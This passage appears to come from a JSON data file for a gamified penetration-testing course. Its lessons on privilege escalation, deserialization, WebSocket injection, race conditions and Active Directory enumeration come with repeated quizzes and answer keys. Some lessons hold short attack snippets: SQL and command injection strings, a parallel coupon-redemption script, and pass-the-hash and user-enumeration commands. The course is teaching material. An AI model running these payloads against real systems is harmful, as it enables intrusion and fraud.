compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1}]},{"id":"pe2-snap-confine","cat":"Privilege Escalation","title":"Snap-Confine Bypass","diff":4,"xp":250,"intro":"Escape snap confinement for privilege escalation.","sections":[{"type":"text","content":"snap-confine CVEs allow breaking out of the snap sandbox to gain root."},{"type":"code","lang":"bash","content":"# CVE-2022-3328: snap-confine race condition\n# Allows arbitrary file access as root\n# Check: snap version"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Snap confinement bypass gives...","opts":["Only snap access","Root access by escaping the sandbox","Network access","User access"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1}]},{"id":"ex2-deserialization-overview","cat":"Exploitation","title":"Deserialization Attack Overview","diff":2,"xp":150,"intro":"Every language has unsafe deserialization.","sections":[{"type":"text","content":"Java (ysoserial), Python (pickle), PHP (unserialize), Ruby (YAML), .NET (BinaryFormatter) \u2014 all allow RCE."},{"type":"code","lang":"bash","content":"# Java: ysoserial\n# Python: pickle\n# PHP: unserialize with __wakeup/__destruct\n# Ruby: YAML.load\n# .NET: BinaryFormatter"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Deserialization RCE exists in...","opts":["Only Java","Most programming languages","Only Python","Only PHP"],"ans":1},{"type":"quiz","q":"NTDS.dit contains...","opts":["Web pages","All domain user password hashes","Network configs","Log files"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1}]},{"id":"ex2-websocket-inject","cat":"Exploitation","title":"WebSocket Injection","diff":3,"xp":200,"intro":"Inject payloads through WebSocket messages.","sections":[{"type":"text","content":"If the server processes WebSocket messages without sanitization, inject SQLi/XSS/command injection."},{"type":"code","lang":"javascript","content":"// WebSocket SQLi\nws.send(JSON.stringify({query: \"' OR 1=1--\"}));\n// WebSocket command injection\nws.send(JSON.stringify({cmd: \"; id\"}));"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"WebSocket injection targets...","opts":["The connection","Unsanitized message processing on the server","The handshake","The protocol"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"ex2-race-web","cat":"Exploitation","title":"Race Condition Exploitation","diff":3,"xp":200,"intro":"Concurrent requests to exploit check-then-act.","sections":[{"type":"text","content":"Send 50 parallel requests to redeem a coupon \u2014 multiple may succeed."},{"type":"code","lang":"python","content":"import threading\ndef redeem(): requests.post(url,json={'code':'DISC50'})\n[threading.Thread(target=redeem).start() for _ in range(50)]"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Race conditions exploit...","opts":["Encryption","Non-atomic operations between check and action","Missing auth","Weak passwords"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1}]},{"id":"px2-powerview","cat":"Post-Exploitation","title":"PowerView AD Enumeration","diff":2,"xp":150,"intro":"The essential PowerShell AD enumeration tool.","sections":[{"type":"text","content":"PowerView queries AD without admin: users, groups, ACLs, computers, GPOs, trusts."},{"type":"code","lang":"powershell","content":"Import-Module PowerView.ps1\nGet-DomainUser | select samaccountname\nGet-DomainGroup -AdminCount\nFind-DomainShare -CheckAccess"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"PowerView enumerates...","opts":["Only users","AD: users, groups, ACLs, computers, GPOs, trusts","Only groups","Only computers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"px2-evil-winrm","cat":"Post-Exploitation","title":"Evil-WinRM Techniques","diff":1,"xp":100,"intro":"Interactive PowerShell over WinRM from Linux.","sections":[{"type":"text","content":"evil-winrm supports: hash auth, file upload/download, and PowerShell execution."},{"type":"code","lang":"bash","content":"evil-winrm -i target -u admin -H NTLM_HASH\n# Upload: upload /local/file C:\\remote\\file\n# Download: download C:\\remote\\file /local/file"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"evil-winrm connects via...","opts":["SSH","WinRM (port 5985/5986)","RDP","SMB"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1},{"type":"quiz","q":"GCM provides...","opts":["Only encryption","Only auth","Encryption AND authentication","Key exchange"],"ans":2},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1}]},{"id":"px2-kerbrute","cat":"Post-Exploitation","title":"Kerbrute User Enumeration","diff":1,"xp":100,"intro":"Enumerate valid AD usernames via Kerberos pre-auth.","sections":[{"type":"text","content":"Kerberos returns different errors for valid vs invalid usernames \u2014 no lockout."},{"type":"code","lang":"bash","content":"kerbrute userenum -d corp.local --dc DC users.txt\n# Valid: KDC_ERR_PREAUTH_REQUIRED\n# Invalid: KDC_ERR_C_PRINCIPAL_UNKNOWN"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Kerbrute avoids lockout because...","opts":["It's slow","Kerberos pre-auth doesn't trigger lockout policies","It uses encryption","It's passive"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"Shell stabilization adds...","opts":["Encryption","Tab completion and proper terminal","Speed","Stealth"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1}]},{"id":"cr2-hash-id","cat":"Cryptography","title":"Hash Type Identification","diff":1,"xp":50,"intro":"Identify hash types by format and length.","sections":[{"type":"text","content":"MD5 (32 hex), SHA1 (40 hex), SHA256 (64 hex), bcrypt ($2b$), NTLM (32 hex)."},{"type":"code","lang":"bash","content":"hashid 'hash_value'\nhash-identifier\n# 32 chars hex = MD5 or NTLM\n# 40 chars hex = SHA1\n# 64 chars hex = SHA256\n# $2b$12$ = bcrypt"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"A 32-character hex hash is likely...","opts":["SHA256","MD5 or NTLM","SHA1","bcrypt"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS 